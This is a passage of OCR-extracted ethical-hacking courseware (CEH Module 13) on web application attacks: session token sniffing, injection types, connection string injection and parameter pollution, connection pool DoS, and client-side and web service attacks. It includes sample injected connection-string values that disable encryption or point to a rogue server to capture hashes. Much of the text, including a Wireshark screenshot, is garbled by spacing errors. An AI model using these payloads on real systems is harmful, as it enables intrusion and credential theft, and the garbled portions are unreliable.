n and a n a lyzin g it fo r e n c o d in g (h e x -e n c o d in g, Base64) o r a ny p a tte rn. If any m e a n in g can be re ve rse e n g in e e re d fro m th e sa m p le o f session to k e n s, a tta c k e rs a tte m p t to guess th e M odule 13 Page 1879

158 to k e n s re c e n tly issued to o th e r a p p lic a tio n users. A tta c k e rs th e n m a ke a large n u m b e r o f re q u e s ts w ith th e p re d ic te d to k e n s to a s e s s io n -d e p e n d e n t page to d e te rm in e a v a lid se ssio n. M odule 13 Page 1880

159 !7 A t t a c k i n g S e s s i o n T o k e n s H a n d l i n g r c u M e c h a n i s m : S e s s i o n T o k e n S n i f f i n g J L ^ A tta cke rs s n iff th e a p p lic a tio n tra ffic using a s n iffin g to o l such as W ire s h a rk o r an in te rc e p tin g p ro x y such as B u rp. If HTTP cookie s a re being used as th e tra n sm issio n m echanism fo r session tokens and th e secure fla g is n o t set, atta cke rs can replay th e cookie to gain unauthorized access to application A ttacker can use session cookies to perform session hijacking, session replay, and M an-in -the-m iddle attacks A t t a c k i n g S e s s i o n T o k e n s H a n d l i n g M e c h a n i s m : S e s s i o n T o k e n S n i f f i n g A tta c k e rs fir s t s n iff th e n e tw o rk tr a ffic fo r v a lid session to k e n s and th e n p re d ic t th e n e x t session to k e n based on th e s n iffe d session to k e n. The a tta c k e r uses th e p re d ic te d session ID to a u th e n tic a te h im o r h e rs e lf w ith th e ta rg e t w e b a p p lic a tio n. Thus, s n iffin g th e v a lid session to k e n is im p o r ta n t in se ssio n m a n a g e m e n t a tta c k s. A tta c k e rs s n iff th e a p p lic a tio n tr a ffic using a s n iffin g to o l such as W ire s h a rk o r an in te rc e p tin g p ro x y such as B urp. If HTTP c o o k ie s are b e in g used as th e tra n s m is s io n m e ch a n ism fo r session to k e n s and th e s e c u rity fla g is n o t set, a tta c k e rs can re p la y th e co o kie to gain u n a u th o riz e d access to a p p lic a tio n. A tta c k e rs can use session co o kie s to p e rfo rm session h ija c k in g, session re p la y, and m a n -in -th e -m id d le a tta cks. W i r e s h a r k S ource: h ttp ://w w w.w ir e s h a rk.o rg W ire s h a rk is a n e tw o rk p ro to c o l a n a lyze r. It lets yo u c a p tu re and in te ra c tiv e ly b ro w s e th e tr a ffic ru n n in g on a c o m p u te r n e tw o rk. It c a p tu re s live n e tw o rk tr a ffic fro m E th e rn e t, IEEE , PPP/HDLC, A T M, B lu e to o th, USB, T o k e n R ing, F ra m e R elay, a n d FDDI n e tw o rk s. C a p tu re d file s can be p ro g ra m m a tic a lly e d ite d via th e c o m m a n d line. M odule 13 Page 1881

160 ] ) k3j T e s t ( W S ). p c a p n g [ W i r e s h a r k ( S V N R e v f r o m / t r u n k 1. 8 ile E d it y ie w J jo C a p tu r e A n a ly z e S ta tis tic s T e le p h o n y J o o ls In te r n a ls H e lp st v a a m B ( 3 <3. Q. <3, F ilt e r v E xp re s s io n... C le a r A p p ly S ave N o. T im e S o u rc e D e s tin a tio n P r o to c o l L e n g th In fo T C P 5 4 s e r v i c e - c t r l > h t t p s [ a c k ] s e q = 3 8 A c k = 3 8 w i i f e 8 0 : : b 9 e a : d O l l : 3 e 0 f f 0 2 : : 1 : 2 D H C P v S o l i c i t X I D : 0 x 5 a 8 2 d f C I D : e 2 2 a a b T C P 9 1 [ T C P s e g m e n t o f a r e a s s e m b l e d P D U ] T C P 6 0 x m p p - c l i e n t > q w a v e [ a c k ] s e q - 1 A c k w i n f e 8 0 : : 5 d f 8 : C 2 d 8 : 5 b b f f 0 2 : : 1 : 2 D H C P V S o l i c i t X I D : 0 x 8 3 e C I D : e 8 e l 4 e T C P 66 w e b m a i l - 2 > h t t p [ s y n ] s e q = 0 w i n = L e n = T C P 6 0 h t t p > w e b m a i l - 2 [ s y n, a c k ] s e q = 0 A c k = l w i n T C P 6 0 w e b m a i l - 2 > h t t p [ a c k ] s e q = A c k = l w i n = ! l H T T 9 7 G E T / n e w m a i l / m a i s i g n o u t. p h p H T T P / 1. 1 P 1 1 l T C P 6 0 h t t p > w e b m a i l - 2 [ a c k ] s e q l A c k w i n = 8 : T C P 1 4 [ t c p s e g m e n t o f a r e a s s e m b l e d p d u ] 1 5 < III H T T P / O K ( t e x t / h t m l ) > <1 HI II > a a d 5 4 O d O a : 2 2 : 3 4 G M T.. S e r v U 3 a b l b b O d O a / 4 2 d e r : A p a c h e.. S e t t 6 f 6 b a 20 5 f 6 e f 3 d 6 4 c o o k i e : n l 8 u = d c b d e l e t e d ; e x p i r e s - O O a O C d d T h u, s e p O O bo a a d b : 2 2 : 3 3 G M T ; p ו. - n O O co d 2 f 3 b f 6 d e 3 d 2 e 6 9 a t h - / ; d o m a i O O d O 6 e 2 e d O d O a a 20 n. c o m.. E x p i r e s : O O e O c e 6 f T h u, 1 9 N o v O O fo a a d 5 4 O d O a : 5 2 : 0 0 G M T.. C d f 6 e f 6C 3 a 20 6 e 6 f a c h e - c o n t r o l : n o d f c 20 6 e 6 f 2 d s t o r e, n o - c a c h e c 20 6 d d c , m u s t - r e v a l i d a t c f d b 3 d c e, p o s t - c h e c k = d b 3 d 3 0 O d O a p r e - c h e c k = 0.. P r File: "E :\C E H -T00ls \C E H v8 M o d u le 08 S n iffe rs ' P a c k e ts : D is p la y e d : M a rk e d : 0 L o a d tim e : 0 : P ro file : D e fa u lt ז 2 V F I G U R E : W i r e s h a r k T o o l S c r e e n s h o t M odule 13 Page 1882

161 Web App H acking M ethodology C EH Attack Footprint Web Analyze Web Authorization Perform Attack Infrastructure Applications Schemes Injection Attacks Web App Client Attack Web Servers Attack Authentication Mechanism Attack Session Management Mechanism Attack Data Connectivity Attack Web Services C o p y r ig h t b y EC-Gauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b A p p H a c k i n g M e t h o d o l o g y l - H H In je c tio n a tta c k s are v e ry c o m m o n in w e b a p p lic a tio n s. T h e re are m a n y ty p e s o f in je c tio n a tta c k s such as w e b scrip ts in je c tio n, OS c o m m a n d s in je c tio n, SMTP in je c tio n, SQL in je c tio n, LDAP in je c tio n, and XP ath in je c tio n. A p a rt fro m all th e s e in je c tio n a tta c k s, a fre q u e n tly o c c u rrin g a tta c k is a SQL in je c tio n a tta c k. In je c tio n fre q u e n tly ta ke s place w h e n th e d a ta th a t is g ive n by th e user is s e n t to th e in te r p r e te r as a p a rt o f a c o m m a n d o r q u e ry. For la u n c h in g an in je c tio n a tta c k, th e a tta c k e r su p p lie s th e c ra fte d d a ta th a t tric k s and m akes th e in te r p r e te r to e x e c u te th e c o m m a n d s o r q u e ry th a t are u n in te n d e d. Because o f th e in je c tio n fla w s, th e a tta c k e r can e asily read, c re a te, u p d a te, and re m o v e a ny o f th e a rb itra r y d a ta, i.e., a v a ila b le to th e a p p lic a tio n. In so m e cases, th e a tta c k e r can e ven bypass a d e e p ly n e ste d fire w a ll e n v iro n m e n t and can ta k e c o m p le te c o n tro l o v e r th e a p p lic a tio n and th e u n d e rly in g s yste m. The d e ta il o f each in je c tio n a tta c k is give n o n th e fo llo w in g slides. M odule 13 Page 1883

162 Injection Attacks נ CEH Urt1fw4 ilhiul luthm J I n i n j e c t i o n a t t a c k s, a t t a c k e r s s u p p l y c r a f t e d m a l i c i o u s i n p u t t h a t i s s y n t a c t i c a l l y c o r r e c t a c c o r d i n g t o t h e i n t e r p r e t e d l a n g u a g e b e i n g u s e d i n o r d e r t o b r e a k a p p l i c a t i o n ' s n o r m a l i n t e n d e d W e b S c rip ts In je c tio n S Q L I n j e c t i o n D If user in p u t is used in to code th a t is dynam ically executed, enter crafted in p u t th a t breaks th e intended data context and executes com m ands on the server B E n t e r a s e r i e s o f m a l i c i o u s S Q L q u e r i e s i n t o i n p u t f i e l d s t o d i r e c t l y m a n i p u l a t e t h e d a t a b a s e O S C o m m a n d s I n j e c t i o n E x p l o i t o p e r a t i n g s y s t e m s b y e n t e r i n g m a l i c i o u s c o d e s i n i n p u t f i e l d s i f a p p l i c a t i o n s Bu t i l i z e u s e r i n p u t i n a s y s t e m - l e v e l c o m m a n d ש ם L D A P I n j e c t i o n T a k e a d v a n t a g e o f n o n - v a l i d a t e d w e b a p p l i c a t i o n i n p u t v u l n e r a b i l i t i e s t o p a s s L D A P f i l t e r s t o o b t a i n d i r e c t a c c e s s t o d a t a b a s e s S M T P I n j e c t i o n I n j e c t a r b i t r a r y S T M P c o m m a n d s i n t o a p p l i c a t i o n a n d S M T P s e r v e r c o n v e r s a t i o n t o Bg e n e r a t e l a r g e v o l u m e s o f s p a m e m a i l a B X P a t h I n j e c t i o n E n t e r m a l i c i o u s s t r i n g s i n i n p u t f i e l d s i n o r d e r t o m a n i p u l a t e t h e X P a t h q u e r y s o t h a t i t i n t e r f e r e s w i t h t h e a p p l i c a t i o n ' s l o g i c N o t e : F o r c o m p l e t e c o v e r a g e o f S Q L I n j e c t i o n c o n c e p t s a n d t e c h n i q u e s r e f e r t o M o d u l e 1 4 : S Q L I n j e c t i o n C o p y r ig h t b y EC-Gauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. I I n j e c t i o n A t t a c k s In in je c tio n a tta c k s, a tta c k e rs s u p p ly c ra fte d m a lic io u s in p u t th a t is s y n ta c tic a lly c o rre c t a c c o rd in g to th e in te rp re te d langu ag e b e in g used in o rd e r to b re a k th e a p p lic a tio n 's n o rm a lly in te n d e d in p u t. Q Q W e b S c rip ts In je c tio n : If user in p u t is used in code th a t is d y n a m ic a lly e x e c u te d, e n te r c ra fte d in p u t th a t b re aks th e in te n d e d d a ta c o n te x t and e xecu te s c o m m a n d s on th e se rv e r OS C o m m a n d s In je c tio n : E x p lo it o p e ra tin g syste m s by e n te rin g m a lic io u s code in in p u t fie ld s if a p p lic a tio n s u tiliz e user in p u t in a s y s te m -le v e l c o m m a n d SM TP In je c tio n : In je c t a rb itra ry SMTP c o m m a n d s in to a p p lic a tio n and SMTP se rv e r c o n v e rs a tio n to g e n e ra te large v o lu m e s o f spam e m a il 0 SQL In je c tio n : E n te r a se ries o f m a lic io u s SQL q u e rie s in to in p u t fie ld s to d ire c tly m a n ip u la te th e d a ta b a se LDAP In je c tio n : Take a d va n ta g e o f n o n -v a lid a te d w e b a p p lic a tio n in p u t v u ln e ra b ilitie s to pass LDAP filte rs to o b ta in d ire c t access to d ata base s X P ath In je c tio n : E n te r m a lic io u s strin g s in in p u t fie ld s in o rd e r to m a n ip u la te th e XPath q u e ry so th a t it in te rfe re s w ith th e a p p lic a tio n 's logic M odule 13 Page 1884

163 Note: For c o m p le te co ve ra g e o f SQL In je c tio n c o n c e p ts and te c h n iq u e s, re fe r to M o d u le 14: SQL In je c tio n A tta cks. M odule 13 Page 1885

164 Attack Attack Attack Session Attack Attack Web Servers Authentication Management Data Connectivity Web Services Mechanism Mechanism C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b A p p H a c k i n g M e t h o d o l o g y J A tta c k in g th e d a ta c o n n e c tiv ity a llo w s th e a tta c k e r to gain u n a u th o riz e d c o n tro l o v e r ^ ^ th e in fo rm a tio n in th e d a ta b a se. The v a rio u s ty p e s o f d a ta c o n n e c tiv ity a tta c k s and th e ir causes as w e ll as co n se q u e n ces are e x p la in e d in d e ta il on th e fo llo w in g slides. M odule 13 Page 1886

165 A tta c k D a ta C o n n e c tiv ity CEH ~ r ץ D a t a b a s e c o n n e c t i o n s t r i n g s a r e u s e d D a t a b a s e c o n n e c t i v i t y a t t a c k s e x p l o i t t o c o n n e c t a p p l i c a t i o n s t o d a t a b a s e t h e w a y a p p l i c a t i o n s c o n n e c t t o t h e e n g i n e s d a t a b a s e i n s t e a d o f a b u s i n g "D a ta S o u rc e = S e rv e r,p o rt; N etwork Library=DBMSSOCN; I n i t i a l C atalog=d atab ase; User ID=Username; Password=pwd;" E x a m p l e o f a c o m m o n c o n n e c t i o n s t r i n g u s e d t o c o n n e c t t o a M i c r o s o f t 0 r r 0r r 0r r 0r r < s = d a t a b a s e q u e r i e s D a t a C o n n e c t i v i t y A t t a c k s S C o n n e c t i o n S t r i n g I n j e c t i o n S C o n n e c t i o n S t r i n g P a r a m e t e r P o l l u t i o n ( C S P P ) A t t a c k s S C o n n e c t i o n P o o l D o S S Q L S e r v e r d a t a b a s e 0 T r o _ y v _ J L C o p y r ig h t b y EC-Gauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. ^ A A t t a c k D a t a C o n n e c t i v i t y A tta c k e rs d ire c tly a tta c k d a ta c o n n e c tiv ity so th a t th e y can access se n sitive in fo rm a tio n a va ila b le in th e d a ta b a se. D atabase c o n n e c tiv ity a tta c k s e x p lo it th e w a y a p p lic a tio n s c o n n e c t to th e d a ta b a se in ste a d o f a b u s in g d a ta b a s e q u e rie s. Data Connectivity Attacks C o n n e c tio n S trin g In je c tio n C o n n e c tio n S trin g P a ra m e te r P o llu tio n (CSPP) A tta c k s C o n n e c tio n Pool DoS D atabase c o n n e c tio n strin g s are used to c o n n e c t a p p lic a tio n s to d a ta b a s e e n g in e s: " D a ta S o u r c e = S e r v e r,p o r t; N e tw o rk Library=D B M S S O C N ; I n i t i a l C a ta lo g = D a ta B a s e ; U s e r ID = U s e rn a m e ; P a s s w o rd = p w d ;" E xam ple o f a c o m m o n c o n n e c tio n s trin g used to c o n n e c t to a M ic ro s o ft SQL S e rver d a ta b a se M odule 13 Page 1887

166 C o n n e c tio n S trin g In je c tio n CEH I n a d e l e g a t e d a u t h e n t i c a t i o n e n v i r o n m e n t, t h e a t t a c k e r i n j e c t s p a r a m e t e r s i n a c o n n e c t i o n s t r i n g b y a p p e n d i n g t h e m w i t h t h e s e m i c o l o n ( ; ) c h a r a c t e r A c o n n e c t i o n s t r i n g i n j e c t i o n a t t a c k c a n o c c u r w h e n a d y n a m i c s t r i n g c o n c a t e n a t i o n i s u s e d t o b u i l d c o n n e c t i o n s t r i n g s b a s e d o n u s e r i n p u t B e f o r e I n j e c t i o n "Data Source=Server,Port; Network Library=DBMSSOCN; I n it ia l Catalog=DataBase; User ID=Username; Password=pwd;" A f t e r I n j e c t i o n "Data Source=Server,Port; Network Library=DBMSSOCN; I n it ia l Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off" W h e n th e c o n n e c tio n s trin g is p o p u la te d, th e Encryption v a lu e w ill b e a d d e d to th e p re v io u s ly c o n fig u re d s e t o f p a ra m e te rs C o p y r ig h t b y EC-Gauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. C o n n e c t i o n S t r i n g I n j e c t i o n ^ A c o n n e c tio n s trin g in je c tio n a tta c k can o c c u r w h e n d y n a m ic s trin g c o n c a te n a tio n is used to b u ild c o n n e c tio n strin g s th a t are based on user in p u t. If th e s trin g is n o t v a lid a te d and m a lic io u s te x t o r c h a ra c te rs n o t e scaped, an a tta c k e r can p o te n tia lly access s e n s itiv e d a ta o r o th e r re so u rces on th e se rve r. For e x a m p le, an a tta c k e r co u ld m o u n t an a tta c k by s u p p ly in g a s e m ic o lo n and a p p e n d in g an a d d itio n a l va lu e. The c o n n e c tio n s trin g is p arsed by using a "la s t o n e w in s " a lg o rith m, and th e h o s tile in p u t is s u b s titu te d fo r a le g itim a te valu e. The c o n n e c tio n s trin g b u ild e r classes are d e sig n e d to e lim in a te g u e s s w o rk and p ro te c t a g a in st syn ta x e rro rs and s e c u rity v u ln e ra b ilitie s. T h e y p ro v id e m e th o d s and p ro p e rtie s c o rre s p o n d in g to th e k n o w n k e y /v a lu e p airs p e rm itte d by each d a ta p ro v id e r. Each class m a in ta in s a fix e d c o lle c tio n o f s y n o n y m s and can tra n s la te fro m a s y n o n y m to th e c o rre s p o n d in g w e ll-k n o w n key n a m e. Checks a re p e rfo rm e d fo r v a lid k e y /v a lu e p airs and an in v a lid p a ir th ro w s an e x c e p tio n. In a d d itio n, in je c te d va lu e s a re h a n d le d in a safe m a n n e r. B e fo re in je c tio n The C o m m o n c o n n e c tio n s trin g gets c o n n e c te d to th e M ic ro s o ft SQL S e rver d a ta b a se as sh o w n as fo llo w s : M odule 13 Page 1888

167 " D a t a S o u r c e = S e r v e r,p o r t ; N e t w o r k L i b r a r y = D B M S S O C N ; I n i t i a l C a t a l o g = D a t a B a s e ; U s e r I D = U s e r n a m e ; P a s s w o r d = p w d ; F I G U R E : B e f o r e i n j e c t i o n A fte r in je c tio n The a tta c k e rs can e asily in je c t p a ra m e te rs ju s t by jo in in g a s e m ic o lo n (;) c h a ra c te r using c o n n e c tio n s trin g in je c tio n te c h n iq u e s in a d e le g a te d a u th e n tic a tio n e n v iro n m e n t. In th e fo llo w in g e xa m p le, th e user is asked to give a user n a m e and p a ssw o rd fo r c re a tin g a c o n n e c tio n s trin g. H ere th e a tta c k e r e n te rs th e p a ssw o rd as "p w d ; E n c ry p tio n = o ff"; it m eans th a t th e a tta c k e r has v o id e d th e e n c ry p tio n syste m. The re s u ltin g c o n n e c tio n s trin g b e co m e s: "D ata S ource=s erver,p o r t; N etwork Library=DBMSSOCN; I n i t i a l C atalog=database; User ID=Username; Password=pwd; E n c ry p tio n = o ff" F I G U R E : A f t e r i n j e c t i o n W h e n th e c o n n e c tio n s trin g is p o p u la te d, th e e n c ry p tio n va lu e w ill be a d d e d to th e p re v io u s ly c o n fig u re d se t o f p a ra m e te rs. M odule 13 Page 1889

168 Connection String Param eter r CII Pollution (CSPP) Attacks <.!1E!1 A ttacker tries to connect to th e database by using th e W eb A p plication System account instead o f a user-provided set of credentials D a ta s o u r c e - S Q L ; i n i t i a l c a t a l o g d b l ; i n t e g r a t e d s e c u r i t y n o ; u s e r i d ; D a t a S o u r c e R o g u e ; S e r v e r ; P a s s w o r d I n t e g r a t e d S e c u r i t y t r u e ; A ttacker w ill then sn iff W indow s credentia ls (password hashes) when th e application tries to connect to Rogue_Server w ith th e W indow s credentials it's running on D a ta s o u r c e S Q L ; i n i t i a l c a t a l o g d b l ; i n t e g r a t e d s e c u r i t y n o ; u s e r i d ; D a t a S o u r c e T a r g e t S e r v e r, T a r g e t ; P o r t ; P a s s w o r d I n t e g r a t e d S e c u r i t y t r u e ; D a ta s o u r c e S Q L ; i n i t i a l c a t a l o g d b l / i n t e g r a t e d s e c r u r i t y n o ; u s e r i d ; D a t a S o u r c e T a r g e t S e r v e r, T a r g e t P o r t ; P a s s w o r d ; I n t e g r a t e d S e c u r i t y t r u e ; C o p y r ig h t by EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. C o n n e c t i o n S t r i n g P a r a m e t e r P o l l u t i o n ( C S P P ) A t t a c k s C o n n e c tio n s trin g p a ra m e te r p o llu tio n (CSPP) is used by a tta c k e rs to steal user IDs and to h ija ck w e b c re d e n tia ls. CSPP e x p lo its s p e c ific a lly th e s e m ic o lo n d e lim ite d d a ta b a se c o n n e c tio n strin g s th a t are c o n s tru c te d d y n a m ic a lly based on th e u ser in p u ts fro m w e b a p p lic a tio n s. In CSPP a tta cks, a tta c k e rs o v e rw rite p a ra m e te r va lu e s in th e c o n n e c tio n s trin g. H a s h S t e a l i n g. An a tta c k e r re p la ce s th e va lu e o f d a ta so u rce p a ra m e te r w ith th a t o f a R ogue M ic r o s o ft SQL S e rv e r c o n n e c te d to th e In te rn e t ru n n in g a s n iffe r: D a ta s o u r c e = SQ L2005; i n i t i a l c a t a lo g ID = ;D a ta S o u rce = R o g u e S e r v e r ; Passw ord= d b l ; in t e g r a t e d s e c u r it y = n o ; u s e r I n t e g r a t e d S e c u r it y = t r u e ; A tta c k e rs w ill th e n s n iff W in d o w s c re d e n tia ls (p a ssw o rd hashes) w h e n th e a p p lic a tio n trie s to c o n n e c t to R ogue_s erve r w ith th e W in d o w s c re d e n tia ls it's ru n n in g on. ב P o r t S c a n n i n g A tta c k e r trie s to c o n n e c t to d iffe r e n t p o rts by ch a n g in g th e va lu e and seeing th e e rro r m essages o b ta in e d. M odule 13 Page 1890

169 D a ta s o u r c e = SQ L2005; i n i t i a l c a t a lo g = d b l ; in t e g r a t e d s e c u r it y = n o ; u s e r ID = ;D a ta S o u r c e = T a r g e t S e r v e r, T a r g e t P o r t= ; P a s s w o rd = ; I n t e g r a t e d S e c u r it y = t r u e ; H i j a c k i n g W e b C r e d e n t i a l s A tta c k e r trie s to c o n n e c t to th e d a ta b a se by using th e W e b A p p lic a tio n S ystem a c c o u n t in s te a d o f a u s e r-p ro v id e d se t o f c re d e n tia ls. D a ta s o u r c e = SQ L2005; i n i t i a l c a t a lo g = d b l ; in t e g r a t e d s e c u r it y = n o ; u s e r ID = ;D a ta S o u r c e = T a rg e t S e r v e r, T a r g e t P o r t ; P a s s w o rd = ; I n t e g r a t e d S e c u r it y = t r u e ; M odule 13 Page 1891

170 Connection Pool DoS CEH C«rt1fW4 ItliK4I Km Im( A t t a c k e r e x a m i n e s t h e c o n n e c t i o n p o o l i n g s e t t i n g s o f t h e a p p l i c a t i o n, c o n s t r u c t s a l a r g e m a l i c i o u s S Q L q u e r y, a n d r u n s m u l t i p l e q u e r i e s s i m u l t a n e o u s l y t o c o n s u m e a l l c o n n e c t i o n s i n t h e c o n n e c t i o n p o o l, c a u s i n g d a t a b a s e q u e r i e s t o f a i l f o r l e g i t i m a t e u s e r s Example: B y d e f a u l t i n A S P. N E T, t h e m a x i m u m a l l o w e d c o n n e c t i o n s i n t h e p o o l i s & a n d t i m e o u t i s 3 0 s e c o n d s T h u s, a n a t t a c k e r c a n r u n m u l t i p l e q u e r i e s w i t h s e c o n d s e x e c u t i o n t i m e w i t h i n 3 0 s e c o n d s t o c a u s e a c o n n e c t i o n p o o l D o S s u c h t h a t n o o n e e l s e w o u l d b e a b l e t o u s e t h e d a t a b a s e - r e l a t e d p a r t s o f t h e a p p l i c a t i o n C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. * C o n n e c t i o n P o o l D o S The a tta c k e r e xa m in e s th e c o n n e c tio n p o o lin g s e ttin g s o f th e a p p lic a tio n, c o n s tru c ts a large m a lic io u s SQL q u e ry, and runs m u ltip le q u e rie s s im u lta n e o u s ly to co n s u m e all c o n n e c tio n s in th e c o n n e c tio n p o o l, ca using d a ta b a se q u e rie s to fa il fo r le g itim a te users. E x a m p le : By d e fa u lt, in ASP.NET, th e m a x im u m a llo w e d c o n n e c tio n s in th e p o o l is 100 and tim e o u t is 30 secon ds. T hus, an a tta c k e r can ru n 100 m u ltip le q u e rie s w ith 30+ seconds e x e c u tio n tim e w ith in 30 seconds to cause a c o n n e c tio n p o o l DoS such th a t no o n e else w o u ld be a b le to use th e d a ta b a se re la te d p a rts o f th e a p p lic a tio n. M odule 13 Page 1892

171 Web App H acking M ethodology CEH ( rtifwd itfciul luilwt Attack Footprint Web Analyze Web Authorization Perform Attack Infrastructure Applications Schemes Injection Attacks Web App Client W e b A p p H a c k i n g M e t h o d o l o g y A t t a c k W e b A p p C l i e n t A tta c k s p e rfo rm e d on a s e rv e r-s id e a p p lic a tio n in fe c t th e c lie n t-s id e a p p lic a tio n w h e n th e c lie n t-s id e a p p lic a tio n in te ra c ts w ith th e s e m a lic io u s se rv e r o r process m a lic io u s d a ta. The a tta c k o n th e c lie n t side o ccurs w h e n th e c lie n t e sta b lish e s a c o n n e c tio n w ith th e se rve r. If th e re is no c o n n e c tio n b e tw e e n c lie n t and se rve r, th e n th e re is no risk. This is b ecause no m a lic io u s d a ta is passed by th e se rv e r to th e c lie n t. C o n sid e r an e x a m p le o f a c lie n t-s id e a tta c k w h e re an in fe c te d w e b page ta rg e ts a s p e c ific b ro w s e r w e a k n e s s and e x p lo its it su cce ssfu lly. As a re s u lt, th e m a lic io u s se rv e r gains u n a u th o riz e d c o n tro l o v e r th e c lie n t syste m. M odule 13 Page 1893

172 Attack Web App Client J A t t a c k e r s i n t e r a c t w i t h t h e s e r v e r - s i d e a p p l i c a t i o n s i n u n e x p e c t e d w a y s i n o r d e r t o p e r f o r m m a l i c i o u s a c t i o n s a g a i n s t t h e e n d u s e r s a n d a c c e s s u n a u t h o r i z e d d a t a Redirection Attacks Frame Injection Session Fixation ActiveX Attacks Cross-Site Scripting HTTP Header Injection Request Forgery Attack Privacy Attacks C o p y r ig h t b y EC-Council. A l l R ig h ts R e s e r v e d R e p r o d u c tio n i s S t r i c t l y P r o h ib ite d. A t t a c k W e b A p p C l i e n t A tta c k e rs in te ra c t w ith th e se rv e r-s id e a p p lic a tio n s in u n e x p e c te d w ays in o rd e r to p e rfo rm m a lic io u s a c tio n s a g a in st th e e nd users and access u n a u th o riz e d d a ta. A tta c k e rs use v a rio u s m e th o d s to p e rfo rm th e m a lic io u s a tta c k s. The fo llo w in g a re th e m a lic io u s a tta cks p e rfo rm e d by a tta c k e rs to c o m p ro m is e c lie n t-s id e w e b a p p lic a tio n s : C ross-site S c rip tin g R e d ire c tio n A tta c k s HTTP H e a d e r In je c tio n F ram e In je c tio n R equest F o rg e ry A tta c k s Session F ixa tio n P rivacy A tta c k s A ctive X A tta c k s M odule 13 Page 1894

173 An a tta c k e r bypasses th e c lie n ts ID's s e c u rity m e ch a n ism and gains th e access p riv ile g e s, and th e n in je c ts th e m a lic io u s scrip ts in to th e w e b pages o f a p a rtic u la r w e b s ite. These m a lic io u s scrip ts can e ven re w rite th e H TM L c o n te n t o f th e w e b s ite. I R e d i r e c t i o n A t t a c k s ) / l f A tta c k e rs d e v e lo p codes and lin ks in such a w a y th a t th e y re s e m b le th e m a in site th a t th e user w a n ts to v is it; h o w e v e r, w h e n a user w a n ts to v is it th e re s p e c tiv e site, th e user is re d ire c te d to th e m a lic io u s w e b s ite w h e re th e re is a p o s s ib ility fo r th e a tta c k e r to o b ta in th e u se r's c re d e n tia ls and o th e r s e n s itiv e in fo rm a tio n. t H T T P H e a d e r I n j e c t i o n An a tta c k e r s p lits th e HTTP re sp o n se in to m u ltip le resp onses by in je c tin g a m a lic io u s re sp o n se in HTTP h e a d e rs. This a tta c k can d e fa ce w e b s ite s, p o ison th e cache, and trig g e r cross- site s c rip tin g. F r a m e I n j e c t i o n W h e n scrip ts d o n 't v a lid a te th e ir in p u t, co de s a re in je c te d by th e a tta c k e r th ro u g h fra m e s. This a ffe c ts all th e b ro w s e rs and scrip ts w h ic h d o e s n 't v a lid a te u n tru s te d in p u t. These v u ln e ra b ilitie s o c c u r in H T M L page w ith fra m e s. A n o th e r reason fo r th is v u ln e ra b ility is e d itin g o f th e fra m e s is s u p p o rte d by th e w e b b ro w s e rs. R e q u e s t F o r g e r y A t t a c k In th is a tta c k, th e a tta c k e r e x p lo its th e tru s t o f w e b s ite o r w e b a p p lic a tio n on th e u ser's b ro w s e r. The a tta c k w o rk s by in c lu d in g a lin k in a page th a t accesses a site to w h ic h th e user is a u th e n tic a te d. S e s s i o n F i x a t i o n Session fix a tio n h elps an a tta c k e r to h ija ck a v a lid user session. In th is a tta c k, th e a tta c k e r a u th e n tic a te s h im o r h e rs e lf w ith a k n o w n session ID and th e n h ijacks th e u serv a lid a te d session by th e k n o w le d g e o f th e used session ID. In a session fix a tio n a tta c k, th e a tta c k e r tric k s th e user to access a g e n u in e w e b s e rve r using an e x is tin g se ssio n ID v a lu e. P r i v a c y A t t a c k s A p riv a c y a tta c k is tra c k in g p e rfo rm e d w ith th e h e lp o f a re m o te site th a t is based on a leaked p e rs is te n t b ro w s e r sta te. A A c t i v e X A t t a c k s The a tta c k e r lu re s th e v ic tim via e m a il o r a lin k th a t has b een c ra fte d in such a w a y th a t th e lo o p h o le s o f re m o te e x e c u tio n code b e c o m e accessible. A tta c k e rs gain e q u a l access p riv ile g e s to th a t o f an a u th o riz e d user. M odule 13 Page 1895

174 Attack Web Servers Attack Authentication Mechanism Attack Session Attack Attack Management Data Connectivity Web Services Mechanism C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. W e b A p p H a c k i n g M e t h o d o l o g y A t t a c k W e b S e r v i c e s W e b se rvices a re e asily ta rg e te d by th e a tta c k e r. S erious s e c u rity b re a ch e s are caused w h e n an a tta c k e r c o m p ro m is e s th e w e b services. The d iffe r e n t ty p e s o f w e b s e rv ic e a tta c k s and th e ir co n se q u e n ces are e x p la in e d on th e fo llo w in g slides. M odule 13 Page 1896

175 Attack Web Services CEH J W e b s e r v i c e s w o r k a t o p t h e l e g a c y w e b a p p l i c a t i o n s, a n d a n y a t t a c k o n w e b s e r v i c e w i l l i m m e d i a t e l y e x p o s e a n u n d e r l y i n g a p p l i c a t i o n ' s b u s i n e s s a n d l o g i c v u l n e r a b i l i t i e s f o r v a r i o u s a t t a c k s In fo rm a tio n Leakage, Application Logic Attacks D a t a b a s e A t t a c k s, D o S A t t a c k s C o p y r ig h t b y EC-Cauactl. A ll R ig h ts R e s e rv e d. R e p r o d u c tio n is S t r ic t ly P r o h ib ite d. Cl r j f A t t a c k W e b S e r v i c e s W e b services w o rk a to p th e legacy w e b a p p lic a tio n s, and a n y a tta c k on a w e b se rvice w ill im m e d ia te ly e xpose an u n d e rly in g a p p lic a tio n 's b u sin e ss and lo g ic v u ln e r a b ilitie s fo r v a rio u s a tta cks. W e b se rvices can be a tta c k e d using m a n y te c h n iq u e s as th e y are m a d e a v a ila b le to users th ro u g h v a rio u s m e ch a n ism s. H ence, th e p o s s ib ility o f v u ln e ra b ilitie s increases. The a tta c k e r can e x p lo it th o s e v u ln e r a b ilitie s to c o m p ro m is e th e w e b services. T h e re m a y be m a n y reason s b e h in d a tta c k in g w e b services. A c c o rd in g to th e p u rp o s e, th e a tta c 